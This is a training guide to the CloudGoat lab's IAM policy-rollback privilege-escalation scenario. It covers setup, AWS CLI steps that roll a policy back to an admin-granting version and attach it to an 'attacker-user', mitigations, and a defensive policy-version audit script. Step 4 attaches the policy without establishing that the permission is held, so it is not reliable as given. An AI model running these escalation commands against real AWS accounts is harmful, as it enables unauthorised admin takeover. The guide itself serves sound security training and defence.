Introduction to CloudGoat: Vulnerable-by-Design AWS Security Training
Cloud security is essential to modern IT infrastructures, but understanding how attackers exploit cloud environments is key to implementing effective defenses. This is where CloudGoat comes in—a vulnerable-by-design AWS environment built for security training.
CloudGoat provides a range of scenarios that mimic real-world vulnerabilities, enabling users to learn and practice penetration testing in AWS safely. This guide focuses on one of its most engaging scenarios: IAM Privilege Escalation by Policy Rollback.
Setting Up Your CloudGoat Environment
Before diving into the scenario, setting up your environment is crucial. Here’s how to prepare CloudGoat:
1. Install Docker
Ensure you have Docker installed on your machine to run CloudGoat. Docker simplifies the setup by providing containerized environments.
2. Configure AWS CLI
Install and configure the AWS CLI with credentials and permissions to deploy CloudGoat resources in your AWS account.
aws configure
3. Set Up CloudGoat
Clone the CloudGoat repository:
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
Install the required Python dependencies:
pip install -r requirements.txt
Configure your AWS profile within CloudGoat:
./cloudgoat.py config profile
4. Launch the Scenario
Activate the IAM Privilege Escalation scenario:
./cloudgoat.py create iam_privesc_by_rollback
Scenario: IAM Privilege Escalation by Policy Rollback
In this scenario, an attacker exploits a misconfigured IAM policy to escalate their privileges. The attacker starts with minimal permissions but discovers that they are allowed to roll back an IAM policy to a previous version, and that one of those earlier versions grants administrator access.
Step-by-Step Exploitation: From Limited User to Admin Access
Step 1: Reconnaissance
- Use your limited credentials to query the existing IAM policies. Look for policies that allow the iam:ListPolicyVersions and iam:SetDefaultPolicyVersion actions.
- Check the policy version history to identify potentially exploitable previous versions.
aws iam list-policy-versions --policy-arn arn:aws:iam::123456789012:policy/ExamplePolicy
Step 2: Identify a Vulnerable Policy
Find a policy with a prior version granting AdministratorAccess.
Step 3: Roll Back the Policy
Using the SetDefaultPolicyVersion permission, revert the policy to the vulnerable version:
aws iam set-default-policy-version --policy-arn arn:aws:iam::123456789012:policy/ExamplePolicy --version-id v3
Step 4: Exploit Admin Privileges
Attach the reverted policy to your user, granting yourself admin access:
aws iam attach-user-policy --policy-arn arn:aws:iam::123456789012:policy/ExamplePolicy --user-name attacker-user
Step 5: Verify Admin Access
Execute admin-level commands to confirm privilege escalation.
Cleanup and Lessons Learned: Mitigating IAM Privilege Escalation Risks
Cleanup
Use CloudGoat to destroy the scenario resources:
./cloudgoat.py destroy iam_privesc_by_rollback
Lessons Learned
To prevent privilege escalation in AWS, implement these best practices:
- Least Privilege Principle: Grant only the permissions necessary for each role or user.
- Policy Version Management: Regularly review and delete outdated policy versions.
- Monitor IAM Activities: Use AWS CloudTrail to track IAM actions such as SetDefaultPolicyVersion.
- Implement MFA: Add an extra layer of security for administrative users.
- Use AWS Config Rules: Automate policy compliance checks.
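The policy-version review above can be automated. The following is an added example written for this guide, not code from CloudGoat itself: it audits the version history of one customer-managed policy and flags the exact condition the scenario abuses, a default version that allows iam:SetDefaultPolicyVersion while a non-default version still grants full admin. It works on the decoded JSON that aws iam list-policy-versions and aws iam get-policy-version return; the SAMPLE_VERSIONS data below is constructed to mirror the scenario.

```python
"""Audit an IAM policy's versions for a rollback-to-admin risk."""
import json

# Constructed sample shaped like get-policy-version output (Document already decoded).
SAMPLE_VERSIONS = [
    {"VersionId": "v1", "IsDefaultVersion": False, "Document": {"Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
    {"VersionId": "v2", "IsDefaultVersion": False, "Document": {"Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": ["s3:*"], "Resource": "*"}]}},
    {"VersionId": "v3", "IsDefaultVersion": True, "Document": {"Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Resource": "*",
                       "Action": ["iam:ListPolicyVersions", "iam:SetDefaultPolicyVersion"]}]}},
]

def _as_list(value):
    """IAM allows a string or a list for Statement, Action and Resource."""
    return value if isinstance(value, list) else [value]

def is_admin(doc):
    """True if any Allow statement grants every action on every resource."""
    for stmt in _as_list(doc.get("Statement", [])):
        if stmt.get("Effect") == "Allow" and "*" in _as_list(stmt.get("Action", [])) \
                and "*" in _as_list(stmt.get("Resource", [])):
            return True
    return False

def allows_action(doc, action):
    """Does any Allow statement cover `action`? Handles '*' and prefix wildcards
    such as 'iam:*'. Deny statements and NotAction are ignored (simplification)."""
    for stmt in _as_list(doc.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        for pattern in _as_list(stmt.get("Action", [])):
            if pattern == "*" or pattern.lower() == action.lower() or (
                    pattern.endswith("*") and action.lower().startswith(pattern[:-1].lower())):
                return True
    return False

def audit_policy_versions(versions):
    """Report admin-granting versions and whether the default version allows rollback."""
    default = next((v for v in versions if v.get("IsDefaultVersion")), None)
    admin_versions = [v["VersionId"] for v in versions if is_admin(v["Document"])]
    can_roll_back = bool(default) and allows_action(default["Document"], "iam:SetDefaultPolicyVersion")
    return {
        "default_version": default["VersionId"] if default else None,
        "admin_versions": admin_versions,
        "default_allows_rollback": can_roll_back,
        # The scenario's condition: rollback right plus a dormant admin version.
        "rollback_risk": can_roll_back and bool(admin_versions),
    }

if __name__ == "__main__":
    print(json.dumps(audit_policy_versions(SAMPLE_VERSIONS), indent=2))
```

Running it against every policy returned by aws iam list-policies --scope Local turns the "delete outdated policy versions" advice into a repeatable check; any policy flagged with rollback_risk is a candidate for version deletion.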
Conclusion
Understanding IAM privilege escalation techniques, like the one explored here, helps organizations strengthen their AWS security posture. CloudGoat provides a safe and educational environment where you can learn about these vulnerabilities hands-on. By applying lessons from this scenario, you can effectively mitigate the risks of IAM privilege escalation.